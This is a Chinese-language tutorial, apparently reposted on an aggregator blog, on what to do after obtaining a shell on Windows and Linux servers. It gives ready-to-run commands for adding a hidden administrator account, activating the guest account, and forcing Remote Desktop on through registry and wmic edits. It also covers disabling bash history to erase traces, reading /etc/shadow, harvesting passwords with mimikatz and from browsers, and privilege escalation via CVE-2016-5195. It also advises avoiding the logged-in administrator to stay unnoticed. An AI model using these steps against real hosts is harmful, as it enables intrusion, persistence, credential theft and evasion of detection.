获取Shell(提权)后的操作(windows、Linux)
對(duì)于Windows系統(tǒng)主機(jī)和Linux系統(tǒng)主機(jī),獲取Shell后的操作都不同。
Windows
當(dāng)我們通過對(duì)Web服務(wù)器進(jìn)行滲透,拿到了該Web服務(wù)器的shell后,可以執(zhí)行系統(tǒng)命令后,我們?cè)撊绾尾僮髂?#xff1f;
第一步,先?whoami??查看用戶身份,如果是系統(tǒng)用戶那就再好不過了,如果是普通用戶的話,就得想辦法提權(quán)了。提權(quán)之后,利用mimikatz獲取用戶密碼。如果是域環(huán)境的話,還可以獲取登錄過該主機(jī)的域用戶密碼。傳送門——>?使用 mimikatz 破解windows登錄密碼
或者我們可以反彈一個(gè)MSF類型的shell到kali中,傳送門——>?反彈MSF類型的Shell? ? ,??MSF之后滲透階段
以下命令是在Windows主機(jī)滲透測(cè)試過程中可以用到的
#信息探測(cè) ipconfig #查看ip等信息 systeminfo #查看系統(tǒng)信息 netstat -ano #查看端口開放信息 tasklist /svc #查看進(jìn)程信息 net user #查看主機(jī)用戶 net localgroup #查看主機(jī)組 net share #查看開放的共享 net view #查看內(nèi)網(wǎng)主機(jī)信息#添加用戶后門 net user hack 123 /add #添加用戶并設(shè)置密碼 net localgroup administrators hack /add #將用戶加入管理組 net user guest /active:yes #激活guest用戶 net user guest mstlab #更改guest用戶的密碼更多Windows CMD窗口的命令,傳送門——>?Windows常見的cmd命令
如果對(duì)方主機(jī)沒開3389端口怎么辦?以下命令可以開啟遠(yuǎn)程桌面服務(wù),前提是管理員權(quán)限。
1.通用開3389(優(yōu)化后):wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 2.For Win2003:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 3.For Win2008:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 4.For Every:win08,三條命令即可,win2012通用;win7前兩條即可。權(quán)限需要administrator。wmic /namespace:\root\cimv2 erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1wmic /namespace:\root\cimv2 erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f創(chuàng)建了后門用戶,開啟了遠(yuǎn)程桌面,我們就可以遠(yuǎn)程連接了。但是這里要注意,遠(yuǎn)程連接前判斷該用戶是否在線,萬一對(duì)方管理員在線,你把人家給擠下去了,這樣一下子就暴露了。開啟遠(yuǎn)程桌面前慎重,慎重再慎重。
遠(yuǎn)程桌面登錄后,我們查看桌面上有哪些軟件,我們要找的目標(biāo)有以下。
- FTP相關(guān)的軟件
- 數(shù)據(jù)庫(kù)相關(guān)的軟件
- 打開瀏覽器,查看歷史記錄,查看某些網(wǎng)站是否保存有用戶密碼。利用工具查看瀏覽器保存的密碼
總結(jié):獲得了權(quán)限之后,盡一切可能搜集該主機(jī)的信息,該主機(jī)上各種服務(wù)的用戶名和密碼。為接下來的內(nèi)網(wǎng)滲透弱口令爆破做準(zhǔn)備。
Linux
在獲得了Linux主機(jī)的權(quán)限后。第一步,我們要做的就是讓我們接下來操作的所有命令不在主機(jī)上留下任何痕跡。我們可以執(zhí)行下面的命令,這樣我們接下來執(zhí)行的所有命令都不會(huì)在 .bash_history中看到了。這條命令只對(duì)當(dāng)前終端有效!
export HISTFILE=/dev/null export HISTSIZE=0先查看當(dāng)前用戶身份,是否是root權(quán)限身份,如果不是的話,查看系統(tǒng)版本,是否可以利用已知漏洞提權(quán)的,比如 CVE-2016-5195?。?Linux下用SUID提權(quán)
然后要做的自然就是維持權(quán)限了,傳送門——>??Linux獲取權(quán)限
whoami #查看當(dāng)前用戶身份 uname -a #查看系統(tǒng)信息 history #查看命令歷史,有可能可以查看到管理員的一些重要命令,包括密碼等 last #查看登錄歷史 cat /etc/passwd #查看用戶 cat /etc/shadow #查看密碼?
相關(guān)文章:Linux 主機(jī)超全滲透測(cè)試命令匯總
?
?
總結(jié)
以上是生活随笔為你收集整理的获取Shell(提权)后的操作(windows、Linux)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: C/C++socket send函数MS
- 下一篇: Linux下9个有用的touch命令示例